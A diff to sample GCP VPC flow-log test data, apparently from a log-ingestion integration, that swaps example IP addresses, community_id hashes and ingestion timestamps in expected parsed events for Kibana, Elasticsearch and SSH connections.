"{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", "end": "2019-06-14T03:49:52.101129310Z", @@ -15180,10 +15180,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53104, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -15197,7 +15197,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EvU+L/cBE9vacReP+K7ey2MZ6Bs=", + "community_id": "1:TMH6IVeF6TnVWOY7cFvGCaCMaPY=", "bytes": 37145, "name": "default", "transport": "tcp", 
@@ -15220,7 +15220,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { 
@@ -15256,8 +15256,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868985400Z", - "original": "{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.392015600Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", "end": "2019-06-14T03:49:45.312543839Z", @@ -15284,17 +15284,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53972, "bytes": 1460, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Lyl01hrYioXpfyKN9+mxQ134Q4I=", + "community_id": "1:G2L3Fxl2iVvSfj1H8WznQobSRWA=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -15308,7 +15308,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -15333,8 +15333,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868988300Z", - "original": "{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392021100Z", + "original": 
"{\"insertId\":\"198begsfh44xy3\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53972},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:44:20.634231041Z", "end": "2019-06-14T03:44:20.748121914Z", @@ -15361,17 +15361,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58100, "bytes": 1458, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:9uwmfdC4y+lRXBPaY4e7QA2YCdo=", + "community_id": "1:ceerAKbpeTRZtrx63xVfavQBc2o=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -15385,7 +15385,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -15407,8 +15407,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868991400Z", - "original": "{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392026700Z", + "original": 
"{\"insertId\":\"198begsfh44xxt\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58100},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:20.632737426Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:20.512264850Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:49:20.512264850Z", "end": "2019-06-14T03:49:20.632737426Z", @@ -15429,9 +15429,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58100, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -15445,7 +15445,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9uwmfdC4y+lRXBPaY4e7QA2YCdo=", + "community_id": "1:ceerAKbpeTRZtrx63xVfavQBc2o=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15460,7 +15460,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -15481,8 +15481,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868994200Z", - "original": "{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392032200Z", + "original": 
"{\"insertId\":\"198begsfh44xy8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58100,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:20.632777660Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:20.512407536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:49:20.512407536Z", "end": "2019-06-14T03:49:20.632777660Z", @@ -15503,9 +15503,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 60756, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -15519,7 +15519,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:4doByecCNk4FneiHUzTJOKA7tlc=", + "community_id": "1:uyxwjanUYILl+d9QoxpwFo8pJ48=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15534,7 +15534,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -15558,8 +15558,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868997100Z", - "original": "{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392036900Z", + "original": 
"{\"insertId\":\"198begsfh44xy9\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":60756,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:10.912193869Z", "end": "2019-06-14T03:43:11.032929292Z", @@ -15588,17 +15588,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 14236, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 3 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:41kwAuyQ+p5wBn7ppagdhPjfslw=", + "community_id": "1:qXQaZlrUFOCwuROMy7BhHqdjz/0=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -15612,7 +15612,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -15634,8 +15634,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869000100Z", - "original": "{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392040400Z", + "original": 
"{\"insertId\":\"198begsfh44xxr\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":14236},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:12.064908439Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.247072525Z", "end": "2019-06-14T03:40:12.064908439Z", @@ -15656,9 +15656,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60122, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -15672,7 +15672,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bqmZvpZBw56sKswuSbDTHXnb0TU=", + "community_id": "1:WGg0+cb+0s5Ex6XJLyeCaLPvkpg=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -15687,7 +15687,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -15711,8 +15711,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869003Z", - "original": "{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392044800Z", + "original": 
"{\"insertId\":\"198begsfh44xy2\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60122,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:39.207635184Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:39.087226326Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:41:39.087226326Z", "end": "2019-06-14T03:41:39.207635184Z", @@ -15733,9 +15733,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53972, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -15749,7 +15749,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Lyl01hrYioXpfyKN9+mxQ134Q4I=", + "community_id": "1:G2L3Fxl2iVvSfj1H8WznQobSRWA=", "bytes": 1782, "transport": "tcp", "type": "ipv4", @@ -15764,7 +15764,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -15788,8 +15788,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869006Z", - "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392049Z", + "original": 
"{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:44:20.634231041Z", "end": "2019-06-14T03:44:20.748121914Z", @@ -15816,18 +15816,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33530, "bytes": 68545, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 368 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EnH+d3/qmomg2hTDB2XhQfZVi90=", + "community_id": "1:2r+9oNITMpL8veN57VUSy8JQkp0=", "bytes": 68545, "name": "default", "transport": "tcp", @@ -15849,7 +15849,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
